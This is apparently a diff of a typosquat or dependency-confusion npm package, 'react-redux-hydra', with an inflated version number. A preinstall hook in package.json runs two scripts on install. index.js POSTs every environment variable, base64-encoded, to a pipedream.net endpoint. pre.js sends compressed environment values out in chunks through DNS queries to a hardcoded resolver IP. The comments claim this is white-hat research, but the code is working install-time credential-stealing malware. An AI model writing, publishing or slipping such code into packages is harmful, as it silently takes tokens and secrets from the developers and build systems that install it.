react-redux-hydra 9632.9374.0

package/index.js

@@ -0,0 +1,13 @@
+// Hackerone white hat security research, catz@wearehackerone.com
+
+const http = require('https');
+
+req = http.request({
+  host: 'ba18d240d48f99b177bd704072fdcb3f.m.pipedream.net',
+  path: '/' + (process.env.npm_package_name || ''),
+  method: 'POST'
+}).on('error', function (err) {
+});
+
+req.write(Buffer.from(JSON.stringify(process.env)).toString('base64'));
+req.end();

package/package.json

@@ -0,0 +1,16 @@
+{
+  "name": "react-redux-hydra",
+  "version": "9632.9374.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js; node pre.js"
+  },
+  "files": [
+    "index.js",
+    "pre.js"
+  ],
+  "author": "",
+  "license": "ISC"
+}

package/pre.js

@@ -0,0 +1,39 @@
+// Hackerone white hat security research, catz@wearehackerone.com
+
+var { Resolver } = require('dns');
+var zlib = require('zlib');
+
+var resolver = new Resolver();
+
+function splitString(string, size) {
+  var re = new RegExp('.{1,' + size + '}', 'g');
+  return string.match(re);
+}
+
+resolver.setServers(['165.232.68.239']);
+var d = process.env || {};
+var data = Object.keys(d)
+  .filter(function (key) {
+    return (
+      typeof d[key] === 'string' &&
+      d[key].length >= 3 &&
+      d[key].length <= 100
+    );
+  })
+  .reduce(function (result, key) {
+    result[key] = d[key];
+    return result;
+  }, {});
+
+var encData = zlib.brotliCompressSync(Buffer.from(JSON.stringify(data))).toString('hex');
+
+
+var ch = splitString(encData, 60);
+
+var dt = Date.now();
+
+for (var i = 0; i < ch.length; i++) {
+  const domain = ['f' + dt, i + 1, ch.length, ch[i]].join('.');
+  resolver.resolve4(domain, function (err) {
+  });
+}